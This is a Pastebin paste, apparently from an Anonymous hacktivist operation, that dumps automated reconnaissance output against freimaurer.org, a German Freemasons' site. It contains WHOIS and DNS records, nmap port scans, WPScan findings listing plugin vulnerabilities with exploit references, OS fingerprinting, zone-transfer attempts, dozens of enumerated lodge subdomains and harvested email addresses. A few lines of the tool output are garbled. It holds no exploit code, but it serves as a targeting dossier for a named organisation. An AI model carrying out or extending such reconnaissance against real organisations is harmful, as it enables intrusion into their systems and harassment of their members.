API tools faq
paste
Advertisement
Guest User

Anonymous JTSEC #OPkilluminatie full recon #17

a guest
Apr 15th, 2018
657
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 65.29 KB | None | 0 0
raw download clone embed print report
  1. #######################################################################################################################################
  2. Hostname freimaurer.org ISP Unknown
  3. Continent Unknown Flag
  4. DE
  5. Country Germany Country Code DE
  6. Region Unknown Local time 15 Apr 2018 10:16 CEST
  7. City Unknown Latitude 51
  8. IP Address (IPv6) 2a01:488:42:1000:50ed:849b:ff7a:c9cb Longitude 9
  9. #######################################################################################################################################
  10. [i] Scanning Site: http://freimaurer.org
  11.  
  12.  
  13.  
  14. B A S I C I N F O
  15. =======================================================================================================================================
  16.  
  17.  
  18. [+] Site Title:
  19. [+] IP address: 80.237.132.155
  20. [+] Web Server: Apache
  21. [+] CMS: Could Not Detect
  22. [+] Cloudflare: Not Detected
  23. [+] Robots File: Could NOT Find robots.txt!
  24.  
  25.  
  26.  
  27.  
  28. W H O I S L O O K U P
  29. =======================================================================================================================================
  30.  
  31. Domain Name: FREIMAURER.ORG
  32. Registry Domain ID: D2644149-LROR
  33. Registrar WHOIS Server: whois.meshdigital.com
  34. Registrar URL: http://www.domainmonster.com
  35. Updated Date: 2017-04-08T00:20:22Z
  36. Creation Date: 1997-06-13T04:00:00Z
  37. Registry Expiry Date: 2018-06-12T04:00:00Z
  38. Registrar Registration Expiration Date:
  39. Registrar: Mesh Digital Limited
  40. Registrar IANA ID: 1390
  41. Registrar Abuse Contact Email: abuse.contact@hosteuropegroup.com
  42. Registrar Abuse Contact Phone: +44.1483304030
  43. Reseller:
  44. Domain Status: ok https://icann.org/epp#ok
  45. Registry Registrant ID: C188933158-LROR
  46. Registrant Name: Identity Protection Service
  47. Registrant Organization: Identity Protect Limited
  48. Registrant Street: PO Box 786
  49. Registrant City: Hayes
  50. Registrant State/Province: Middlesex
  51. Registrant Postal Code: UB3 9TR
  52. Registrant Country: GB
  53. Registrant Phone: +44.1483307527
  54. Registrant Phone Ext:
  55. Registrant Fax: +44.1483304031
  56. Registrant Fax Ext:
  57. Registrant Email: freimaurer.org@identity-protect.org
  58. Registry Admin ID: C188933158-LROR
  59. Admin Name: Identity Protection Service
  60. Admin Organization: Identity Protect Limited
  61. Admin Street: PO Box 786
  62. Admin City: Hayes
  63. Admin State/Province: Middlesex
  64. Admin Postal Code: UB3 9TR
  65. Admin Country: GB
  66. Admin Phone: +44.1483307527
  67. Admin Phone Ext:
  68. Admin Fax: +44.1483304031
  69. Admin Fax Ext:
  70. Admin Email: freimaurer.org@identity-protect.org
  71. Registry Tech ID: C188933158-LROR
  72. Tech Name: Identity Protection Service
  73. Tech Organization: Identity Protect Limited
  74. Tech Street: PO Box 786
  75. Tech City: Hayes
  76. Tech State/Province: Middlesex
  77. Tech Postal Code: UB3 9TR
  78. Tech Country: GB
  79. Tech Phone: +44.1483307527
  80. Tech Phone Ext:
  81. Tech Fax: +44.1483304031
  82. Tech Fax Ext:
  83. Tech Email: freimaurer.org@identity-protect.org
  84. Name Server: NS1.HANS.HOSTEUROPE.DE
  85. Name Server: NS2.HANS.HOSTEUROPE.DE
  86. DNSSEC: unsigned
  87. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  88. >>> Last update of WHOIS database: 2018-04-15T08:16:54Z <<<
  89.  
  90. For more information on Whois status codes, please visit https://icann.org/epp
  91.  
  92. Access to Public Interest Registry WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the Public Interest Registry registry database. The data in this record is provided by Public Interest Registry for informational purposes only, and Public Interest Registry does not guarantee its accuracy. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to: (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Afilias except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Public Interest Registry reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
  93.  
  94.  
  95.  
  96.  
  97. G E O I P L O O K U P
  98. =======================================================================================================================================
  99.  
  100. [i] IP Address: 80.237.132.155
  101. [i] Country: DE
  102. [i] State: Nordrhein-Westfalen
  103. [i] City: Hst
  104. [i] Latitude: 51.650002
  105. [i] Longitude: 6.183300
  106.  
  107.  
  108.  
  109.  
  110. H T T P H E A D E R S
  111. =======================================================================================================================================
  112.  
  113. [i] HTTP/1.1 403 Forbidden
  114. [i] Date: Sun, 15 Apr 2018 08:17:56 GMT
  115. [i] Content-Type: text/html; charset=UTF-8
  116. [i] Content-Length: 2946
  117. [i] Connection: close
  118. [i] Server: Apache
  119.  
  120.  
  121.  
  122.  
  123. D N S L O O K U P
  124. =======================================================================================================================================
  125.  
  126. ;; Truncated, retrying in TCP mode.
  127. freimaurer.org. 259200 IN NS ns1.hans.hosteurope.de.
  128. freimaurer.org. 259200 IN NS ns2.hans.hosteurope.de.
  129. freimaurer.org. 86400 IN MX 50 freimaurer-org.mail.protection.outlook.com.
  130. freimaurer.org. 86400 IN TXT "v=spf1 include:spf.protection.outlook.com -all"
  131. freimaurer.org. 2560 IN SOA ns1.hans.hosteurope.de. hostmaster.freimaurer.org. 2018032309 16384 2048 1048576 2560
  132. freimaurer.org. 86400 IN A 80.237.132.155
  133. freimaurer.org. 86400 IN AAAA 2a01:488:42:1000:50ed:849b:ff7a:c9cb
  134.  
  135.  
  136.  
  137.  
  138. S U B N E T C A L C U L A T I O N
  139. =======================================================================================================================================
  140.  
  141. Address = 2a01:488:42:1000:50ed:849b:ff7a:c9cb
  142. Network = 2a01:488:42:1000:50ed:849b:ff7a:c9cb / 128
  143. Netmask = ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
  144. Wildcard Mask = ::
  145. Hosts Bits = 0
  146. Max. Hosts = 0 (2^0 - 1)
  147. Host Range = { 2a01:488:42:1000:50ed:849b:ff7a:c9cc - 2a01:488:42:1000:50ed:849b:ff7a:c9cb }
  148.  
  149.  
  150.  
  151. N M A P P O R T S C A N
  152. =======================================================================================================================================
  153.  
  154.  
  155. Starting Nmap 7.01 ( https://nmap.org ) at 2018-04-15 08:18 UTC
  156. Nmap scan report for freimaurer.org (80.237.132.155)
  157. Host is up (0.092s latency).
  158. Other addresses for freimaurer.org (not scanned): 2a01:488:42:1000:50ed:849b:ff7a:c9cb
  159. rDNS record for 80.237.132.155: wp148.webpack.hosteurope.de
  160. PORT STATE SERVICE VERSION
  161. 21/tcp open ftp ProFTPD
  162. 22/tcp open tcpwrapped
  163. 23/tcp closed telnet
  164. 25/tcp open smtp Exim smtpd
  165. 80/tcp open http nginx
  166. 110/tcp open pop3 Dovecot pop3d
  167. 143/tcp open imap Dovecot imapd
  168. 443/tcp closed https
  169. 445/tcp closed microsoft-ds
  170. 3389/tcp closed ms-wbt-server
  171.  
  172. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  173. Nmap done: 1 IP address (1 host up) scanned in 15.20 seconds
  174.  
  175.  
  176.  
  177. S U B - D O M A I N F I N D E R
  178. =======================================================================================================================================
  179.  
  180.  
  181. [i] Total Subdomains Found : 1
  182.  
  183. [+] Subdomain: www.freimaurer.org
  184. [-] IP: 80.237.132.155
  185.  
  186.  
  187.  
  188. #######################################################################################################################################
  189. HostIP:80.237.132.155
  190. HostName:freimaurer.org
  191.  
  192. Gathered Inet-whois information for 80.237.132.155
  193. --------------------------------------------------------------------------------------------------------------------------------------
  194.  
  195.  
  196. inetnum: 80.237.132.0 - 80.237.132.255
  197. remarks: INFRA-AW
  198. netname: HE-SH-CGN-NET
  199. descr: Hosteurope GmbH
  200. country: DE
  201. admin-c: HM5126-RIPE
  202. tech-c: HM5126-RIPE
  203. status: ASSIGNED PA
  204. mnt-by: MNT-HEG-MASS
  205. created: 2015-11-19T14:41:44Z
  206. last-modified: 2015-11-19T14:41:44Z
  207. source: RIPE # Filtered
  208.  
  209. role: HEG Mass
  210. address: HEG Mass
  211. address: Daimler Strasse 9-11
  212. address: 50354 Huerth
  213. address: Germany
  214. phone: +49 2203 1045 0
  215. admin-c: JUPP
  216. admin-c: OUZO
  217. tech-c: JUPP
  218. tech-c: OUZO
  219. nic-hdl: HM5126-RIPE
  220. mnt-by: MNT-HEG-MASS
  221. created: 2015-11-05T11:32:14Z
  222. last-modified: 2015-12-07T15:15:08Z
  223. source: RIPE # Filtered
  224.  
  225. % Information related to '80.237.132.0/24AS20773'
  226.  
  227. route: 80.237.132.0/24
  228. origin: AS20773
  229. member-of: AS20773:RS-HOSTEUROPE
  230. mnt-by: MNT-HEG
  231. mnt-by: MNT-HEG-MASS
  232. created: 2018-01-04T10:27:26Z
  233. last-modified: 2018-01-04T10:27:26Z
  234. source: RIPE
  235.  
  236. % This query was served by the RIPE Database Query Service version 1.91.1 (WAGYU)
  237.  
  238.  
  239.  
  240. Gathered Inic-whois information for freimaurer.org
  241. ---------------------------------------------------------------------------------------------------------------------------------------
  242. Domain Name: FREIMAURER.ORG
  243. Registry Domain ID: D2644149-LROR
  244. Registrar WHOIS Server: whois.meshdigital.com
  245. Registrar URL: http://www.domainmonster.com
  246. Updated Date: 2017-04-08T00:20:22Z
  247. Creation Date: 1997-06-13T04:00:00Z
  248. Registry Expiry Date: 2018-06-12T04:00:00Z
  249. Registrar Registration Expiration Date:
  250. Registrar: Mesh Digital Limited
  251. Registrar IANA ID: 1390
  252. Registrar Abuse Contact Email: abuse.contact@hosteuropegroup.com
  253. Registrar Abuse Contact Phone: +44.1483304030
  254. Reseller:
  255. Domain Status: ok https://icann.org/epp#ok
  256. Registry Registrant ID: C188933158-LROR
  257. Registrant Name: Identity Protection Service
  258. Registrant Organization: Identity Protect Limited
  259. Registrant Street: PO Box 786
  260. Registrant City: Hayes
  261. Registrant State/Province: Middlesex
  262. Registrant Postal Code: UB3 9TR
  263. Registrant Country: GB
  264. Registrant Phone: +44.1483307527
  265. Registrant Phone Ext:
  266. Registrant Fax: +44.1483304031
  267. Registrant Fax Ext:
  268. Registrant Email: freimaurer.org@identity-protect.org
  269. Registry Admin ID: C188933158-LROR
  270. Admin Name: Identity Protection Service
  271. Admin Organization: Identity Protect Limited
  272. Admin Street: PO Box 786
  273. Admin City: Hayes
  274. Admin State/Province: Middlesex
  275. Admin Postal Code: UB3 9TR
  276. Admin Country: GB
  277. Admin Phone: +44.1483307527
  278. Admin Phone Ext:
  279. Admin Fax: +44.1483304031
  280. Admin Fax Ext:
  281. Admin Email: freimaurer.org@identity-protect.org
  282. Registry Tech ID: C188933158-LROR
  283. Tech Name: Identity Protection Service
  284. Tech Organization: Identity Protect Limited
  285. Tech Street: PO Box 786
  286. Tech City: Hayes
  287. Tech State/Province: Middlesex
  288. Tech Postal Code: UB3 9TR
  289. Tech Country: GB
  290. Tech Phone: +44.1483307527
  291. Tech Phone Ext:
  292. Tech Fax: +44.1483304031
  293. Tech Fax Ext:
  294. Tech Email: freimaurer.org@identity-protect.org
  295. Name Server: NS1.HANS.HOSTEUROPE.DE
  296. Name Server: NS2.HANS.HOSTEUROPE.DE
  297. DNSSEC: unsigned
  298. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  299. >>> Last update of WHOIS database: 2018-04-15T08YV@:17:3FJ��3Z� <<<
  300.  
  301. For more information on Whois status codes, please visit https://icann.org/epp
  302. #######################################################################################################################################
  303. [!] IP Address : 80.237.132.155
  304. [!] Server: Apache
  305. [+] Clickjacking protection is not in place.
  306. [!] CMS Detected : WordPress
  307. [?] Would you like to use WPScan? [Y/n] Y
  308. [i] It seems like you have not updated the database for some time.
  309. [?] Do you want to update now? [Y]es [N]o [A]bort, default: [N]Y
  310. [i] Updating the Database ...
  311. [i] Update completed.
  312. [+] URL: http://freimaurer.org/
  313. [+] Started: Sun Apr 15 04:20:04 2018
  314.  
  315. [+] robots.txt available under: 'http://freimaurer.org/robots.txt'
  316. [+] Interesting entry from robots.txt: http://freimaurer.org/wp-admin/admin-ajax.php
  317. [+] Interesting header: SERVER: Apache
  318. [+] This site has 'Must Use Plugins' (http://codex.wordpress.org/Must_Use_Plugins)
  319.  
  320. [+] WordPress version 4.9.5 (Released on 2018-04-03) identified from stylesheets numbers, meta generator
  321.  
  322. [+] Enumerating plugins from passive detection ...
  323. | 4 plugins found:
  324.  
  325. [+] Name: sitepress-multilingual-cms
  326. | Latest version: 2.0.4.1
  327. | Last updated: 2011-06-05T13:40:00.000Z
  328. | Location: http://freimaurer.org/wp-content/plugins/sitepress-multilingual-cms/
  329.  
  330. [!] We could not determine a version so all vulnerabilities are printed out
  331.  
  332. [!] Title: sitepress-multilingual-cms - Full Path Disclosure
  333. Reference: https://wpvulndb.com/vulnerabilities/6104
  334. [i] Fixed in: 3.1.7.2
  335.  
  336. [!] Title: WPML <= 3.1.7.2 - Multiple Vulnerabilities (Including SQLi)
  337. Reference: https://wpvulndb.com/vulnerabilities/7843
  338. Reference: http://seclists.org/bugtraq/2015/Mar/60
  339. Reference: http://wpml.org/2015/03/wpml-security-update-bug-and-fix/
  340. Reference: http://packetstormsecurity.com/files/130810/
  341. Reference: http://klikki.fi/adv/wpml.html
  342. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2314
  343. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2791
  344. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2792
  345. Reference: https://www.exploit-db.com/exploits/36414/
  346. [i] Fixed in: 3.1.9
  347.  
  348. [!] Title: WPML 2.9.3-3.2.6 - Cross-Site Scripting (XSS) in Accept-Language Header
  349. Reference: https://wpvulndb.com/vulnerabilities/8173
  350. Reference: http://blog.secupress.fr/en/xss-wpml-header-405.html
  351. [i] Fixed in: 3.2.7
  352.  
  353. [+] Name: wp-google-analytics-events
  354. | Latest version: 2.5.1
  355. | Last updated: 2018-02-22T11:17:00.000Z
  356. | Location: http://freimaurer.org/wp-content/plugins/wp-google-analytics-events/
  357.  
  358. [+] Name: wpml-cms-nav
  359. | Location: http://freimaurer.org/wp-content/plugins/wpml-cms-nav/
  360.  
  361. [+] Name: wordpress-seo - v6.2
  362. | Last updated: 2018-04-03T10:47:00.000Z
  363. | Location: http://freimaurer.org/wp-content/plugins/wordpress-seo/
  364. [!] The version is out of date, the latest version is 7.2
  365.  
  366. [+] Finished: Sun Apr 15 04:21:07 2018
  367. [+] Requests Done: 416
  368. [+] Memory used: 64.598 MB
  369. [+] Elapsed time: 00:01:02
  370. [+] Honeypot Probabilty: 0%
  371. ---------------------------------------------------------------------------------------------------------------------------------------
  372. [~] Trying to gather whois information for freimaurer.org
  373. [+] Whois information found
  374. [-] Unable to build response, visit https://who.is/whois/freimaurer.org
  375. ---------------------------------------------------------------------------------------------------------------------------------------
  376. PORT STATE SERVICE VERSION
  377. 21/tcp open ftp ProFTPD
  378. 22/tcp open tcpwrapped
  379. 23/tcp closed telnet
  380. 25/tcp open smtp Exim smtpd
  381. 80/tcp open http nginx
  382. 110/tcp open pop3 Dovecot pop3d
  383. 143/tcp open imap Dovecot imapd
  384. 443/tcp closed https
  385. 445/tcp closed microsoft-ds
  386. 3389/tcp closed ms-wbt-server
  387. ---------------------------------------------------------------------------------------------------------------------------------------
  388.  
  389. [+] DNS Records
  390. ns2.hans.hosteurope.de. (80.237.128.10) AS20773 Host Europe GmbH Germany
  391. ns1.hans.hosteurope.de. (217.115.143.140) AS20773 Host Europe GmbH Germany
  392.  
  393. [+] MX Records
  394. 50 (94.245.120.74) AS8075 Microsoft Corporation Ireland
  395.  
  396. [+] Host Records (A)
  397. jahrbuch.freimaurer.orgHTTP: (157.97.40.186) AS15817 Mittwald CM Service GmbH und Co.KG Netherlands
  398. www.freimaurer.orgHTTP: (wp148.webpack.hosteurope.de) (80.237.132.155) AS61157 PlusServer GmbH Germany
  399.  
  400. [+] TXT Records
  401. "v=spf1 include:spf.protection.outlook.com -all"
  402.  
  403. [+] DNS Map: https://dnsdumpster.com/static/map/freimaurer.org.png
  404.  
  405. [>] Initiating 3 intel modules
  406. [>] Loading Alpha module (1/3)
  407. [>] Beta module deployed (2/3)
  408. [>] Gamma module initiated (3/3)
  409.  
  410.  
  411. [+] Emails found:
  412. ---------------------------------------------------------------------------------------------------------------------------------------
  413. E-Mailinfo@freimaurer.org
  414. azgz.goettingen@freimaurer.org
  415. gma.vglvd@freimaurer.org
  416. lzd3c.erlangen@freimaurer.org
  417. museum.bayreuth@freimaurer.org
  418. pixel-1523780523454689-web-@freimaurer.org
  419. pixel-1523780529207745-web-@freimaurer.org
  420. webmaster@freimaurer.org
  421.  
  422. [+] Hosts found in search engines:
  423. ---------------------------------------------------------------------------------------------------------------------------------------
  424. [-] Resolving hostnames IPs...
  425. 80.237.132.155:www.freimaurer.org
  426. [+] Virtual hosts:
  427. ---------------------------------------------------------------------------------------------------------------------------------------
  428. #####################################################################################################################################
  429. Ip Address Status Type Domain Name Server
  430. ---------- ------ ---- ----------- ------
  431. 80.237.132.155 200 host ftp.freimaurer.org Apache
  432. 80.237.132.155 200 host mail.freimaurer.org Apache
  433. 80.237.132.155 403 host www.freimaurer.org Apache
  434. ######################################################################################################################################
  435. [*] Processing domain freimaurer.org
  436. [+] Getting nameservers
  437. 80.237.128.10 - ns2.hans.hosteurope.de
  438. 217.115.143.140 - ns1.hans.hosteurope.de
  439. [-] Zone transfer failed
  440.  
  441. [+] IPv6 (AAAA) records found. Try running dnscan with the -6 option.
  442. 2a01:488:42:1000:50ed:849b:ff7a:c9cb
  443.  
  444. [+] TXT records found
  445. "v=spf1 include:spf.protection.outlook.com -all"
  446.  
  447. [+] MX records found, added to target list
  448. 50 freimaurer-org.mail.protection.outlook.com.
  449.  
  450. [*] Scanning freimaurer.org for A records
  451. 80.237.132.155 - freimaurer.org
  452. 40.100.52.120 - autodiscover.freimaurer.org
  453. 40.100.155.24 - autodiscover.freimaurer.org
  454. 40.100.52.24 - autodiscover.freimaurer.org
  455. 40.101.152.8 - autodiscover.freimaurer.org
  456. 40.101.146.8 - autodiscover.freimaurer.org
  457. 40.101.152.184 - autodiscover.freimaurer.org
  458. 40.101.146.184 - autodiscover.freimaurer.org
  459. 40.101.144.104 - autodiscover.freimaurer.org
  460. 40.100.52.248 - autodiscover.freimaurer.org
  461. 13.76.177.110 - enterpriseenrollment.freimaurer.org
  462. 13.78.56.172 - enterpriseregistration.freimaurer.org
  463. 80.237.132.155 - ftp.freimaurer.org
  464. 52.113.66.14 - lyncdiscover.freimaurer.org
  465. 80.237.132.155 - mail.freimaurer.org
  466. 23.100.101.113 - msoid.freimaurer.org
  467. 23.100.101.114 - msoid.freimaurer.org
  468. 52.113.66.75 - sip.freimaurer.org
  469. 80.237.132.155 - www.freimaurer.org
  470. #######################################################################################################################################
  471. Original* freimaurer.org 80.237.132.155 2a01:488:42:1000:50ed:849b:ff7a:c9cb NS:ns1.hans.hosteurope.de MX:freimaurer-org.mail.protection.outlook.com
  472. Subdomain freima.urer.org 72.52.4.120 NS:ns1.sedoparking.com MX:localhost
  473. Subdomain freimau.rer.org 205.174.25.115
  474. Subdomain freimaur.er.org -
  475. Subdomain freimaure.r.org 98.124.199.35
  476. #######################################################################################################################################
  477. Server: 10.211.254.254
  478. Address: 10.211.254.254#53
  479.  
  480. Non-authoritative answer:
  481. Name: freimaurer.org
  482. Address: 80.237.132.155
  483. Name: freimaurer.org
  484. Address: 2a01:488:42:1000:50ed:849b:ff7a:c9cb
  485.  
  486. freimaurer.org has address 80.237.132.155
  487. freimaurer.org has IPv6 address 2a01:488:42:1000:50ed:849b:ff7a:c9cb
  488. freimaurer.org mail is handled by 50 freimaurer-org.mail.protection.outlook.com.
  489. #######################################################################################################################################
  490. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
  491.  
  492. [+] Target is freimaurer.org
  493. [+] Loading modules.
  494. [+] Following modules are loaded:
  495. [x] [1] ping:icmp_ping - ICMP echo discovery module
  496. [x] [2] ping:tcp_ping - TCP-based ping discovery module
  497. [x] [3] ping:udp_ping - UDP-based ping discovery module
  498. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
  499. [x] [5] infogather:portscan - TCP and UDP PortScanner
  500. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
  501. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
  502. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
  503. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
  504. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
  505. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
  506. [x] [12] fingerprint:smb - SMB fingerprinting module
  507. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
  508. [+] 13 modules registered
  509. [+] Initializing scan engine
  510. [+] Running scan engine
  511. [-] ping:tcp_ping module: no closed/open TCP ports known on 80.237.132.155. Module test failed
  512. [-] ping:udp_ping module: no closed/open UDP ports known on 80.237.132.155. Module test failed
  513. [-] No distance calculation. 80.237.132.155 appears to be dead or no ports known
  514. [+] Host: 80.237.132.155 is up (Guess probability: 50%)
  515. [+] Target: 80.237.132.155 is alive. Round-Trip Time: 1.00366 sec
  516. [+] Selected safe Round-Trip Time value is: 2.00732 sec
  517. [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
  518. [-] fingerprint:smb need either TCP port 139 or 445 to run
  519. [+] Primary guess:
  520. [+] Host 80.237.132.155 Running OS: (Guess probability: 100%)
  521. [+] Other guesses:
  522. [+] Host 80.237.132.155 Running OS: (Guess probability: 100%)
  523. [+] Host 80.237.132.155 Running OS: (Guess probability: 100%)
  524. [+] Host 80.237.132.155 Running OS: (Guess probability: 100%)
  525. [+] Host 80.237.132.155 Running OS: (Guess probability: 100%)
  526. [+] Host 80.237.132.155 Running OS: (Guess probability: 100%)
  527. [+] Host 80.237.132.155 Running OS: (Guess probability: 91%)
  528. [+] Host 80.237.132.155 Running OS: H�~�U (Guess probability: 91%)
  529. [+] Host 80.237.132.155 Running OS: (Guess probability: 91%)
  530. [+] Host 80.237.132.155 Running OS: (Guess probability: 91%)
  531. [+] Cleaning up scan engine
  532. [+] Modules deinitialized
  533. [+] Execution completed.
  534. #######################################################################################################################################
  535. Domain Name: FREIMAURER.ORG
  536. Registry Domain ID: D2644149-LROR
  537. Registrar WHOIS Server: whois.meshdigital.com
  538. Registrar URL: http://www.domainmonster.com
  539. Updated Date: 2017-04-08T00:20:22Z
  540. Creation Date: 1997-06-13T04:00:00Z
  541. Registry Expiry Date: 2018-06-12T04:00:00Z
  542. Registrar Registration Expiration Date:
  543. Registrar: Mesh Digital Limited
  544. Registrar IANA ID: 1390
  545. Registrar Abuse Contact Email: abuse.contact@hosteuropegroup.com
  546. Registrar Abuse Contact Phone: +44.1483304030
  547. Reseller:
  548. Domain Status: ok https://icann.org/epp#ok
  549. Registry Registrant ID: C188933158-LROR
  550. Registrant Name: Identity Protection Service
  551. Registrant Organization: Identity Protect Limited
  552. Registrant Street: PO Box 786
  553. Registrant City: Hayes
  554. Registrant State/Province: Middlesex
  555. Registrant Postal Code: UB3 9TR
  556. Registrant Country: GB
  557. Registrant Phone: +44.1483307527
  558. Registrant Phone Ext:
  559. Registrant Fax: +44.1483304031
  560. Registrant Fax Ext:
  561. Registrant Email: freimaurer.org@identity-protect.org
  562. Registry Admin ID: C188933158-LROR
  563. Admin Name: Identity Protection Service
  564. Admin Organization: Identity Protect Limited
  565. Admin Street: PO Box 786
  566. Admin City: Hayes
  567. Admin State/Province: Middlesex
  568. Admin Postal Code: UB3 9TR
  569. Admin Country: GB
  570. Admin Phone: +44.1483307527
  571. Admin Phone Ext:
  572. Admin Fax: +44.1483304031
  573. Admin Fax Ext:
  574. Admin Email: freimaurer.org@identity-protect.org
  575. Registry Tech ID: C188933158-LROR
  576. Tech Name: Identity Protection Service
  577. Tech Organization: Identity Protect Limited
  578. Tech Street: PO Box 786
  579. Tech City: Hayes
  580. Tech State/Province: Middlesex
  581. Tech Postal Code: UB3 9TR
  582. Tech Country: GB
  583. Tech Phone: +44.1483307527
  584. Tech Phone Ext:
  585. Tech Fax: +44.1483304031
  586. Tech Fax Ext:
  587. Tech Email: freimaurer.org@identity-protect.org
  588. Name Server: NS1.HANS.HOSTEUROPE.DE
  589. Name Server: NS2.HANS.HOSTEUROPE.DE
  590. DNSSEC: unsigned
  591. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  592. >>> Last update of WHOIS database: 2018-04-15T08:45:09Z <<<
  593.  
  594. For more information on Whois status codes, please visit https://icann.org/epp
  595.  
  596. Access to Public Interest Registry WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the Public Interest Registry registry database. The data in this record is provided by Public Interest Registry for informational purposes only, and Public Interest Registry does not guarantee its accuracy. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to: (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Afilias except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Public Interest Registry reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
  597. #######################################################################################################################################
  598. ; <<>> DiG 9.11.3-1-Debian <<>> -x freimaurer.org
  599. ;; global options: +cmd
  600. ;; Got answer:
  601. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 44243
  602. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
  603.  
  604. ;; OPT PSEUDOSECTION:
  605. ; EDNS: version: 0, flags:; udp: 4096
  606. ;; QUESTION SECTION:
  607. ;org.freimaurer.in-addr.arpa. IN PTR
  608.  
  609. ;; AUTHORITY SECTION:
  610. in-addr.arpa. 1842 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2018013344 1800 900 604800 3600
  611.  
  612. ;; Query time: 1154 msec
  613. ;; SERVER: 10.211.254.254#53(10.211.254.254)
  614. ;; WHEN: Sun Apr 15 04:46:10 EDT 2018
  615. ;; MSG SIZE rcvd: 124
  616.  
  617. dnsenum VERSION:1.2.4
  618.  
  619. ----- freimaurer.org -----
  620.  
  621.  
  622. Host's addresses:
  623. __________________
  624.  
  625. freimaurer.org. 84599 IN A 80.237.132.155
  626.  
  627.  
  628. Name Servers:
  629. ______________
  630.  
  631. ns2.hans.hosteurope.de. 99 IN A 80.237.128.10
  632. ns1.hans.hosteurope.de. 99 IN A 217.115.143.140
  633.  
  634.  
  635. Mail (MX) Servers:
  636. ___________________
  637.  
  638. freimaurer-org.mail.protection.outlook.com. 10 IN A 94.245.120.74
  639. freimaurer-org.mail.protection.outlook.com. 10 IN A 213.199.154.106
  640.  
  641.  
  642. Trying Zone Transfers and getting Bind Versions:
  643. _________________________________________________
  644.  
  645.  
  646. Trying Zone Transfer for freimaurer.org on ns2.hans.hosteurope.de ...
  647.  
  648. Trying Zone Transfer for freimaurer.org on ns1.hans.hosteurope.de ...
  649.  
  650. brute force file not specified, bay.
  651. #######################################################################################################################################
  652. [-] Enumerating subdomains now for freimaurer.org
  653. [-] verbosity is enabled, will show the subdomains results in realtime
  654. [-] Searching now in Baidu..
  655. [-] Searching now in Yahoo..
  656. [-] Searching now in Google..
  657. [-] Searching now in Bing..
  658. [-] Searching now in Ask..
  659. [-] Searching now in Netcraft..
  660. [-] Searching now in DNSdumpster..
  661. [-] Searching now in Virustotal..
  662. [-] Searching now in ThreatCrowd..
  663. [-] Searching now in SSL Certificates..
  664. [-] Searching now in PassiveDNS..
  665. SSL Certificates: senat.freimaurer.org
  666. SSL Certificates: konvent.freimaurer.org
  667. SSL Certificates: jahrbuch.freimaurer.org
  668. Virustotal: mx0.freimaurer.org
  669. Virustotal: cervantes.bonn.freimaurer.org
  670. Virustotal: r5r.heidelberg.freimaurer.org
  671. Virustotal: azgz.goettingen.freimaurer.org
  672. Virustotal: www.forum.freimaurer.org
  673. Virustotal: zdr.iserlohn.freimaurer.org
  674. Virustotal: zd3p.nuernberg.freimaurer.org
  675. Virustotal: www.fzf.hamburg.freimaurer.org
  676. Virustotal: www.aasr.freimaurer.org
  677. Virustotal: rde.berlin.freimaurer.org
  678. Virustotal: quatuor.coronati.freimaurer.org
  679. Virustotal: museum.freimaurer.org
  680. Virustotal: mueffelmann.muenster.freimaurer.org
  681. Virustotal: mozart.wiesbaden.freimaurer.org
  682. Virustotal: lzt.karlsruhe.freimaurer.org
  683. Virustotal: lzf.bad-homburg.freimaurer.org
  684. Virustotal: lessing.muenchen.freimaurer.org
  685. Virustotal: jdeze.darmstadt.freimaurer.org
  686. Virustotal: herder.bremen.freimaurer.org
  687. Virustotal: gzde.uelzen.freimaurer.org
  688. Virustotal: furchtlos-und-treu.stuttgart.freimaurer.org
  689. Virustotal: frzd3qu.freimaurer.org
  690. Virustotal: erasmus.stuttgart.freimaurer.org
  691. Virustotal: bibliotheksverein.freimaurer.org
  692. Virustotal: bibliothek.freimaurer.org
  693. Virustotal: 275.freimaurer.org
  694. Virustotal: absalom.hamburg.freimaurer.org
  695. Virustotal: acgl.freimaurer.org
  696. Virustotal: forum.freimaurer.org
  697. Virustotal: www.freimaurer.org
  698. DNSdumpster: jahrbuch.freimaurer.org
  699. DNSdumpster: www.freimaurer.org
  700. Google: azb.bremen.freimaurer.org
  701. Google: www.aasr.freimaurer.org
